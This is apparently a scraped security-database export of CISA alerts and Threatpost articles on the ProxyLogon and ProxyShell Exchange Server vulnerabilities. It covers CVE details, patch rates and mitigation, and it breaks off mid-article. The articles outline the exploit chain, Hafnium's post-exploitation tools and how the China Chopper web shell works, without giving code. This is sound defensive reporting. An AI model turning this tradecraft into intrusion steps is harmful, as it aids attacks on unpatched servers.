These vulnerabilities are being actively exploited in the wild.\n\nCISA encourages users and administrators to review the [Microsoft blog post](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) and apply the necessary updates or workarounds.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/03/02/microsoft-releases-out-band-security-updates-exchange-server>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-02T00:00:00", "type": "cisa", "title": "Microsoft Releases Out-of-Band Security Updates for Exchange Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-02T00:00:00", "id": "CISA:16DE226AFC5A22020B20927D63742D98", "href": 
"https://us-cert.cisa.gov/ncas/current-activity/2021/03/02/microsoft-releases-out-band-security-updates-exchange-server", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-22T22:07:03", "description": "Malicious cyber actors are actively exploiting the following ProxyShell vulnerabilities: [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>), [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>), and [CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>). An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine. CISA strongly urges organizations to identify vulnerable systems on their networks and immediately apply [Microsoft's Security Update from May 2021](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/11/microsoft-releases-may-2021-security-updates>)\u2014which remediates all three ProxyShell vulnerabilities\u2014to protect against these attacks. 
\n\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-21T00:00:00", "type": "cisa", "title": "Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-21T00:00:00", "id": "CISA:8C51810D4AACDCCDBF9D526B4C21660C", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-03-26T19:00:10", "description": "The patching level for Microsoft Exchange Servers that are vulnerable to the 
[ProxyLogon group of security bugs](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) has reached 92 percent, according to Microsoft.\n\nThe computing giant [tweeted out the stat](<https://twitter.com/msftsecresponse/status/1374075310195412992>) earlier this week \u2013 though of course patching won\u2019t fix already-compromised machines. Still, that\u2019s an improvement of 43 percent just since last week, Microsoft pointed out (using telemetry from RiskIQ).\n\n> Our work continues, but we are seeing strong momentum for on-premises Exchange Server updates: \n\u2022 92% of worldwide Exchange IPs are now patched or mitigated. \n\u2022 43% improvement worldwide in the last week. [pic.twitter.com/YhgpnMdlOX](<https://t.co/YhgpnMdlOX>)\n> \n> \u2014 Security Response (@msftsecresponse) [March 22, 2021](<https://twitter.com/msftsecresponse/status/1374075310195412992?ref_src=twsrc%5Etfw>)\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nThe good news on patching comes as a whirlwind of ProxyLogon cyberattacks has hit companies across the globe, with multiple advanced persistent threats (APT) and possibly other adversaries moving quickly to exploit the bug. 
A spate of public proof-of-concept exploits has added fuel to the fire \u2013 which is blazing so bright that F-Secure said on Sunday that hacks are occurring \u201cfaster than we can count,\u201d with tens of thousands of machines compromised.\n\n\u201cTo make matters worse, proof-of-concept automated attack scripts are being made publicly available, making it possible for even unskilled attackers to quickly gain remote control of a vulnerable Microsoft Exchange Server,\u201d according to [F-Secure\u2019s writeup](<https://blog.f-secure.com/microsoft-exchange-proxylogon/>). \u201cThere is even a fully functioning package for exploiting the vulnerability chain published to the Metasploit application, which is commonly used for both hacking- and security testing. This free-for-all attack opportunity is now being exploited by vast numbers of criminal gangs, state-backed threat actors and opportunistic script kiddies.\u201d\n\nThe attackers are using ProxyLogon to carry out a range of attacks, including data theft and the installation of malware, such as the recently discovered \u201cBlackKingdom\u201d strain. According to Sophos, the ransomware operators are asking for $10,000 in Bitcoin in exchange for an encryption key.\n\n## **Patching Remains Tough for Many**\n\nThe CyberNews investigation team [found](<https://cybernews.com/news/patched-microsoft-exchange-servers-give-a-false-sense-of-security-says-cisas-brandon-wales/>) 62,174 potentially vulnerable unpatched Microsoft Exchange Servers around the world, as of Wednesday.\n\n\n\nClick to enlarge. 
Source: CyberNews.\n\nVictor Wieczorek, practice director for Threat & Attack Simulation at GuidePoint Security, noted that some organizations are not structured or resourced to patch effectively against ProxyLogon.\n\n\u201cThis is because, 1) a lack of accurate asset inventory and ownership information; and 2) lag time to vet patching for negative impacts on the business and gain approval from asset/business owners to patch,\u201d he told Threatpost. \u201cIf you don\u2019t have an accurate inventory with a high level of confidence, it takes a long time to hunt down affected systems. You have to determine who owns them and if applying the patch would negatively impact the system\u2019s function. Responsible and timely patching takes lots of proactive planning and tracking.\u201d\n\nHe added that by regularly testing existing controls (red-teaming), searching for indicators of existing weakness and active threats (threat hunting), and investing/correcting confirmed vulnerabilities (vulnerability management), organizations are going to be in a much better spot to adjust to emerging vulnerabilities and invoke their incident-response capabilities when needed.\n\n## **APT Activity Continues**\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange servers.\n\nAnd indeed, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access. 
It\u2019s also apparent that Hafnium isn\u2019t the only party of interest, according to multiple researchers; [ESET said earlier in March](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that at least 10 different APTs are using the exploit.\n\nThe sheer volume of APTs mounting attacks, most of them starting in the days before ProxyLogon became publicly known, has prompted questions as to the exploit\u2019s provenance \u2013 and ESET researchers mused whether it was shared around the Dark Web on a wide scale.\n\nThe APTs seem mainly bent on cyberespionage and data theft, researchers said.\n\n\u201cThese breaches could be occurring in the background, completely unnoticed. Only after months or years will it become clear what was stolen,\u201d according to F-Secure. \u201cIf an attacker knows what they are doing, the data has most likely already been stolen or is being stolen right now.\u201d\n\nSeveral versions of the on-premise flavor of Exchange are vulnerable to the four bugs, including Exchange 2013, 2016 and 2019. Cloud-based and hosted versions are not vulnerable to ProxyLogon.\n\n## **Patching is Not Enough; Assume Compromise**\n\nUnfortunately, installing the ProxyLogon security patches alone does not guarantee that a server is secure \u2013 an attacker may have breached it before the update was installed.\n\n\u201cPatching is like closing a door. Therefore, 92 percent of the doors have been closed. But the doors were open for a relatively long time and known to all the bad actors,\u201d Oliver Tavakoli, CTO at Vectra, told Threatpost. 
\u201cIdentifying and remediating already compromised systems will be a lot harder.\u201d\n\nBrandon Wales, the acting director for the Cybersecurity and Infrastructure Security Agency (CISA), said during a webinar this week that \u201cpatching is not sufficient.\u201d\n\n\u201cWe know that multiple adversaries have compromised networks prior to patches being applied,\u201d Wales said during a [Cipher Brief webinar](<https://cybernews.com/news/patched-microsoft-exchange-servers-give-a-false-sense-of-security-says-cisas-brandon-wales/>). He added, \u201cYou should not have a false sense of security. You should fully understand the risk. In this case, how to identify whether your system is already compromised, how to remediate it, and whether you should bring in a third party if you are not capable of doing that.\u201d\n\n## **How Businesses Can Protect Against ProxyLogon**\n\nYonatan Amitay, Security Researcher at Vulcan Cyber, told Threatpost that a successful response to mitigate Microsoft Exchange vulnerabilities should consist of the following steps:\n\n * Deploy updates to affected Exchange Servers.\n * Investigate for exploitation or indicators of persistence.\n * Remediate any identified exploitation or persistence and investigate your environment for indicators of lateral movement or further compromise.\n\n\u201cIf for some reason you cannot update your Exchange servers immediately, Microsoft has released instructions for how to mitigate these vulnerabilities through reconfiguration \u2014 here, as they recognize that applying the latest patches to Exchange servers may take time and planning, especially if organizations are not on recent versions and/or associated cumulative and security patches,\u201d he said. 
\u201cNote that the mitigations suggested are not substitutes for installing the updates.\u201d\n\nMicrosoft also has issued a one-click mitigation and remediation tool for small- and medium-sized businesses in light of the ongoing swells of attacks.\n\nVectra\u2019s Tavakoli noted that the mitigation guides and tools Microsoft has supplied don\u2019t necessarily help post-compromise \u2013 they are intended to provide mitigation in advance of fully patching the Exchange server.\n\n\u201cThe end result of a compromise is reflective of the M.O. of each attack group, and that will be far more variable and less amenable to automated cleanup,\u201d he said.\n\nMilan Patel, global head of MSS for BlueVoyant, said that identifying follow-on malicious activity after the bad guys have gotten access to a network requires a good inventory of where data is housed.\n\n\u201cIncident response is a critical reactive tool that will help address what data could have been touched or stolen by the bad guys after they gained access to the critical systems,\u201d he told Threatpost. \u201cThis is critical, this could mean the difference between a small cleanup effort vs. 
potential litigation because sensitive data was stolen from the network.\u201d\n", "cvss3": {}, "published": "2021-03-24T18:39:26", "type": "threatpost", "title": "Microsoft Exchange Servers See ProxyLogon Patching Frenzy", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-24T18:39:26", "id": "THREATPOST:BADA213290027D414693E838771F8645", "href": "https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-16T17:23:15", "description": "As dangerous attacks accelerate against Microsoft Exchange Servers in the wake of the disclosure around the [ProxyLogon group of security bugs](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>), a public proof-of-concept (PoC) whirlwind has started up. 
It\u2019s all leading to a feeding frenzy of cyber-activity.\n\nThe good news, however, is that Microsoft has issued a one-click mitigation and remediation tool in light of the ongoing swells of attacks.\n\nResearchers said that while advanced persistent threats (APTs) were the first to the game when it comes to hacking vulnerable Exchange servers, the public PoCs mean that the cat is officially out of the bag, meaning that less sophisticated cybercriminals can start to leverage the opportunity.\n\n\u201cAPTs\u2026can reverse engineer the patches and make their own PoCs,\u201d Roger Grimes, data-driven defense evangelist at KnowBe4, told Threatpost. \u201cBut publicly posted PoCs mean that the thousands of other hacker groups that don\u2019t have that level of sophistication can do it, and even those groups that do have that sophistication can do it faster.\u201d\n\nAfter confirming the efficacy of one of the new public PoCs, security researcher Will Dormann of CERT/CC [tweeted](<https://twitter.com/wdormann/status/1370800181143351296>), \u201cHow did I find this exploit? Hanging out in the dark web? A hacker forum? No. Google search.\u201d\n\n## **What is the ProxyLogon Exploit Against Microsoft Exchange?**\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange servers.\n\nFour flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. 
This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nAnd indeed, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access.\n\nMicrosoft quickly pushed out out-of-band patches for ProxyLogon, but even so, tens of thousands of organizations have so far been compromised using the exploit chain.\n\nIt\u2019s also apparent that Hafnium isn\u2019t the only party of interest, according to multiple researchers; [ESET said last week](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that at least 10 different APTs are using the exploit.\n\nThe sheer volume of APTs mounting attacks, most of them starting in the days before ProxyLogon became publicly known, has prompted questions as to the exploit\u2019s provenance \u2013 and ESET researchers mused whether it was shared around the Dark Web on a wide scale.\n\nSeveral versions of the on-premise flavor of Exchange are vulnerable to the four bugs, including Exchange 2013, 2016 and 2019. Cloud-based and hosted versions are not vulnerable to ProxyLogon.\n\n## **How Many Organizations and Which Ones Remain at Risk?**\n\nMicrosoft originally identified more than 400,000 on-premise Exchange servers that were at-risk when the patches were first released on March 2. Data collected by RiskIQ [indicated that](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/?utm_campaign=exchange_landscape_blog>) as of March 14, there were 69,548 Exchange servers that were still vulnerable. 
And in a separate analysis from Kryptos Logic, 62,018 servers are still vulnerable to CVE-2021-26855, the server-side request forgery flaw that allows initial access to Exchange servers.\n\n\u201cWe released one additional set of updates on March 11, and with this, we have released updates covering more than 95 percent of all versions exposed on the internet,\u201d according to a [post](<https://www.microsoft.com/security/blog/2021/03/12/protecting-on-premises-exchange-servers-against-recent-attacks/>) published by Microsoft last week.\n\nHowever, Check Point Research (CPR) [said this week](<https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/>) that in its latest observations on exploitation attempts, the number of attempted attacks has increased tenfold, from 700 on March 11 to more than 7,200 on March 15.\n\nAccording to CPR\u2019s telemetry, the most-attacked country has been the United States (accounting for 17 percent of all exploit attempts), followed by Germany (6 percent), the United Kingdom (5 percent), the Netherlands (5 percent) and Russia (4 percent).\n\nThe most-targeted industry sector meanwhile has been government/military (23 percent of all exploit attempts), followed by manufacturing (15 percent), banking and financial services (14 percent), software vendors (7 percent) and healthcare (6 percent).\n\n\u201cWhile the numbers are falling, they\u2019re not falling fast enough,\u201d RiskIQ said in its [post](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/?utm_campaign=exchange_landscape_blog&utm_source=twitter&utm_medium=social&utm_content=exchange_landscape_blog_twitter>). \u201cIf you have an Exchange server unpatched and exposed to the internet, your organization is likely already breached. 
One reason the response may be so slow is many organizations may not realize they have exchange servers exposed to the Internet\u2014this is a common issue we see with new customers.\u201d\n\nIt added, \u201cAnother is that while new patches are coming out every day, many of these servers are not patchable and require upgrades, which is a complicated fix and will likely spur many organizations to migrate to cloud email.\u201d\n\n## **Will the ProxyLogon Attacks Get Worse?**\n\nUnfortunately, it\u2019s likely that attacks on Exchange servers will become more voluminous. Last week, independent security researcher Nguyen Jang [published a PoC on GitHub, ](<https://twitter.com/taviso/status/1370068702817783810>)which chained two of the [ProxyLogon](<https://securityaffairs.co/wordpress/115428/security/microsoft-exchange-emergency-update.html>) vulnerabilities together.\n\nGitHub quickly took it down in light of the hundreds of thousands of still-vulnerable machines in use, but it was still available for several hours.\n\nThen over the weekend, another PoC appeared, flagged and confirmed by CERT/CC\u2019s Dormann:\n\n> Well, I'll say that the ProxyLogon Exchange CVE-2021-26855 Exploit is completely out of the bag by now.<https://t.co/ubsysTeFOj> \nI'm not so sure about the \"Failed to write to shell\" error message. But I can confirm that it did indeed drop a shell on my test Exchange 2016 box. [pic.twitter.com/ijOGx3BIif](<https://t.co/ijOGx3BIif>)\n> \n> \u2014 Will Dormann (@wdormann) [March 13, 2021](<https://twitter.com/wdormann/status/1370800181143351296?ref_src=twsrc%5Etfw>)\n\nEarlier, Praetorian researchers on March 8 published a [detailed technical analysis](<https://www.praetorian.com/blog/reproducing-proxylogon-exploit/>) of CVE-2021-26855 (the one used for initial access), which it used to create an exploit. 
The technical details offer a public roadmap for reverse-engineering the patch.\n\nThe original exploit used by APTs meanwhile could have been leaked or lifted from Microsoft\u2019s information-sharing program, according to a recent report in the Wall Street Journal. [In light of evidence](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that multiple APTs were mounting zero-day attacks in the days before Microsoft released patches for the bugs, the computing giant is reportedly questioning whether an exploit was leaked from one of its security partners.\n\nMAPP delivers relevant bug information to security vendors ahead of disclosure, so they can get a jump on adding signatures and indicators of compromise to their products and services. This can include, yes, exploit code.\n\n\u201cSome of the tools used in the second wave of the attack, which is believed to have begun Feb. 28, bear similarities to proof-of-concept attack code that Microsoft distributed to antivirus companies and other security partners Feb. 23, investigators at security companies say,\u201d according to [the report](<https://www.wsj.com/articles/microsoft-probing-whether-leak-played-role-in-suspected-chinese-hack-11615575793>). \u201cMicrosoft had planned to release its security fixes two weeks later, on March 9, but after the second wave began it pushed out the patches a week early, on March 2, according to researchers.\u201d\n\n## **Microsoft Mitigation Tool**\n\nMicrosoft has released an Exchange On-premises Mitigation Tool (EOMT) tool to help smaller businesses without dedicated security teams to protect themselves.\n\n\u201cMicrosoft has released a new, [one-click mitigation tool](<https://aka.ms/eomt>), Microsoft Exchange On-Premises Mitigation Tool to help customers who do not have dedicated security or IT teams to apply these security updates. 
We have tested this tool across Exchange Server 2013, 2016, and 2019 deployments,\u201d according to a [post](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) published by Microsoft. \u201cThis new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\u201d\n\nMicrosoft said that the tool will mitigate against exploits for the initial-access bug CVE-2021-26855 via a URL rewrite configuration, and will also scan the server using the [Microsoft Safety Scanner](<https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download>) to identify any existing compromises. Then, it will remediate those.\n\n## **China Chopper Back on the Workbench**\n\nAmid this flurry of activity, more is becoming known about how the attacks work. For instance, the APT Hafnium, first flagged by Microsoft, is uploading the well-known China Chopper web shell to victim machines.\n\nThat\u2019s according to [an analysis](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/>) from Trustwave SpiderLabs, which found that China Chopper is specifically being uploaded to compromised Microsoft Exchange servers with a publicly facing Internet Information Services (IIS) web server.\n\nChina Chopper is an Active Server Page Extended (ASPX) web shell that is typically planted on an IIS or Apache server through an exploit. 
Once established, the backdoor \u2014 which [hasn\u2019t been altered much](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) since its inception nearly a decade ago \u2014 allows adversaries to execute various commands on the server, drop malware and more.\n\n\u201cWhile the China Chopper web shell has been around for years, we decided to dig even deeper into how the China Chopper web shell works as well as how the ASP.NET runtime serves these web shells,\u201d according to Trustwave. \u201cThe China Chopper server-side ASPX web shell is [extremely small](<https://threatpost.com/fin7-active-exploits-sharepoint/144628/>) and typically, the entire thing is just one line.\u201d\n\nHafnium is using the JScript version of the web shell, researchers added.\n\n\u201cThe script is essentially a page where when an HTTP POST request is made to the page, and the script will call the JScript \u2018eval\u2019 function to execute the string inside a given POST request variable,\u201d researchers explained. \u201cIn the\u2026script, the POST request variable is named \u2018secret,\u2019 meaning any JScript contained in the \u2018secret\u2019 variable will be executed on the server.\u201d\n\nResearchers added that typically, a China Chopper client component in the form of a C binary file is used on the attacker\u2019s systems.\n\n\u201cThis client allows the attacker to perform many nefarious tasks such as downloading and uploading files, running a virtual terminal to execute anything you normally could using cmd.exe, modifying file times, executing custom JScript, file browsing and more,\u201d explained Trustwave researchers. 
\u201cAll this is made available just from the one line of code running on the server.\u201d\n", "cvss3": {}, "published": "2021-03-16T16:56:26", "type": "threatpost", "title": "Exchange Cyberattacks Escalate as Microsoft Rolls One-Click Fix", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T16:56:26", "id": "THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "href": "https://threatpost.com/microsoft-exchange-cyberattacks-one-click-fix/164817/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-03T22:09:32", "description": "Microsoft has spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server. Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\nThe attacks are \u201climited and targeted,\u201d according to Microsoft, spurring it to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) this week. 
The exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\nHowever, other researchers [have reported](<https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers/>) seeing the activity compromising mass swathes of victim organizations.\n\n\u201cThe team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,\u201d a spokesperson at Huntress told Threatpost.\n\nThe culprit is believed to be an advanced persistent threat (APT) group known as Hafnium (also the name of a chemical element), which has a history of targeting assets in the United States with cyber-espionage campaigns. Targets in the past have included defense contractors, infectious disease researchers, law firms, non-governmental organizations (NGOs), policy think tanks and universities.\n\n\u201cMicrosoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to Hafnium, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures,\u201d according to [an announcement](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) this week from Microsoft on the attacks.\n\n## **Zero-Day Security Bugs in Exchange Server**\n\n\u201cThe fact that Microsoft chose to patch these flaws out-of-band rather than include them as part of next week\u2019s [Patch Tuesday](<https://threatpost.com/exploited-windows-kernel-bug-takeover/163800/>) release leads us to believe the flaws are quite severe even if we don\u2019t know the full scope of those attacks,\u201d Satnam Narang, staff research engineer at Tenable, said via email.\n\nMicrosoft patched the following bugs this 
week, and admins should update accordingly:\n\n * **CVE-2021-26855** is a server-side request forgery (SSRF) vulnerability that allows authentication bypass: A remote attacker can simply send arbitrary HTTP requests to the Exchange server and be able to authenticate to it. From there, an attacker can steal the full contents of multiple user mailboxes.\n * **CVE-2021-26857** is an insecure-deserialization vulnerability in the Unified Messaging service, where untrusted user-controllable data is deserialized by a program. An exploit allows remote attackers with administrator permissions to run code as SYSTEM on the Exchange server.\n * **CVE-2021-26858** and **CVE-2021-27065** are both post-authentication arbitrary file-write vulnerabilities in Exchange. Once authenticated with an Exchange server (using CVE-2021-26855 or with compromised admin credentials), an attacker could write a file to any path on the server \u2013 thus achieving remote code execution (RCE).\n\nResearchers at Volexity originally uncovered the SSRF bug as part of an incident response and noted, \u201cThis vulnerability is remotely exploitable and does not require authentication of any kind, nor does it require any special knowledge or access to a target environment. The attacker only needs to know the server running Exchange and the account from which they want to extract email.\u201d\n\nThey also observed the SSRF bug being chained with CVE-2021-27065 to accomplish RCE in multiple attacks.\n\nIn addition to Volexity, Microsoft credited security researchers at Dubex with uncovering the recent activity, which was first observed in January.\n\n\u201cBased on what we know so far, exploitation of one of the four vulnerabilities requires no authentication whatsoever and can be used to potentially download messages from a targeted user\u2019s mailbox,\u201d said Tenable\u2019s Narang. 
\u201cThe other vulnerabilities can be chained together by a determined threat actor to facilitate a further compromise of the targeted organization\u2019s network.\u201d\n\n## **What Happened in the Hafnium Attacks?**\n\nIn the observed campaigns, the four zero-day bugs were used to gain initial access to targeted Exchange servers and achieve RCE. Hafnium operators then deployed web shells on the compromised servers, which were used to steal data and expand the attack, according to researchers.\n\n\u201cIn all cases of RCE, Volexity has observed the attacker writing webshells (ASPX files) to disk and conducting further operations to dump credentials, add user accounts, steal copies of the Active Directory database (NTDS.DIT) and move laterally to other systems and environments,\u201d according to [Volexity\u2019s writeup](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>).\n\nFollowing web shell deployment, Microsoft found that Hafnium operators performed a range of post-exploitation activity:\n\n * Using Procdump to dump the LSASS process memory;\n * Using 7-Zip to compress stolen data into ZIP files for exfiltration;\n * Adding and using Exchange PowerShell snap-ins to export mailbox data;\n * Using the Nishang Invoke-PowerShellTcpOneLine reverse shell;\n * And downloading PowerCat from GitHub, then using it to open a connection to a remote server.\n\nThe attackers were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users, according to the analysis.\n\n\u201cThe good news for defenders is that the post-exploitation activity is very detectable,\u201d said Katie Nickels, director of intelligence at Red Canary, via email, adding her firm has detected numerous attacks as well. 
“Some of the activity we observed uses [the China Chopper web shell](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>), which has been around for more than eight years, giving defenders ample time to develop detection logic for it.”

## **Who is the Hafnium APT?**

Hafnium has been tracked by Microsoft before, but the company has [only just released a few details](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>) on the APT.

In terms of its tactics, “Hafnium has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control,” according to Microsoft. “Once they’ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA.”

Hafnium operates mainly from leased virtual private servers in the United States and primarily goes after U.S. targets, but is linked to the Chinese government, according to Microsoft. It characterizes the APT as “a highly skilled and sophisticated actor.”

## **Time to Patch: Expect More Attacks Soon**

It should be noted that other researchers say they have seen these vulnerabilities being exploited by different threat actors targeting other regions, according to Narang.

“We expect other threat actors to begin leveraging these vulnerabilities in the coming days and weeks, which is why it is critically important for organizations that use Exchange Server to apply these patches immediately,” he added.

And indeed, researchers at Huntress said they have discovered more than 100 web shells deployed across roughly 1,500 vulnerable servers (with antivirus and endpoint detection and response installed) and expect this number to keep rising.

They’re not alone.

“FireEye has observed these vulnerabilities being exploited in the wild and we are actively working with several impacted organizations,” Charles Carmakal, senior vice president and CTO at FireEye Mandiant, said via email. “In addition to patching as soon as possible, we recommend organizations also review their systems for evidence of exploitation that may have occurred prior to the deployment of the patches.”

**Source record:** “Microsoft Exchange 0-Day Attackers Spy on U.S. Targets” (Threatpost, bulletin family: info); published 2021-03-03T15:30:52, modified 2021-03-03T15:30:52; CVEs: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065; CVSS: none assigned (score 0.0, vector NONE; cvss2/cvss3 empty); id THREATPOST:247CA39D4B32438A13F266F3A1DED10E; <https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>

**Next record** (Threatpost; last seen 2021-03-04T21:57:55):

Hot on the heels of Microsoft’s announcement about active cyber-espionage campaigns that are [exploiting four serious security vulnerabilities](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in Microsoft Exchange Server, the U.S. government is mandating patching for the issues.

The news comes as security firms report escalating numbers of related campaigns led by sophisticated adversaries against a range of high-value targets, especially in the U.S.

The Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive, warning that its partners have observed active exploitation of the bugs in Microsoft Exchange on-premises products, which allow attackers to have “persistent system access and control of an enterprise network.”

“CISA has determined that this exploitation of Microsoft Exchange on-premises products poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action,” reads the [March 3 alert](<https://cyber.dhs.gov/ed/21-02/>).
“This determination is based on the current exploitation of these vulnerabilities in the wild, the likelihood of the vulnerabilities being exploited, the prevalence of the affected software in the federal enterprise, the high potential for a compromise of agency information systems and the potential impact of a successful compromise.”

## **Rapidly Spreading Exchange Server Attacks**

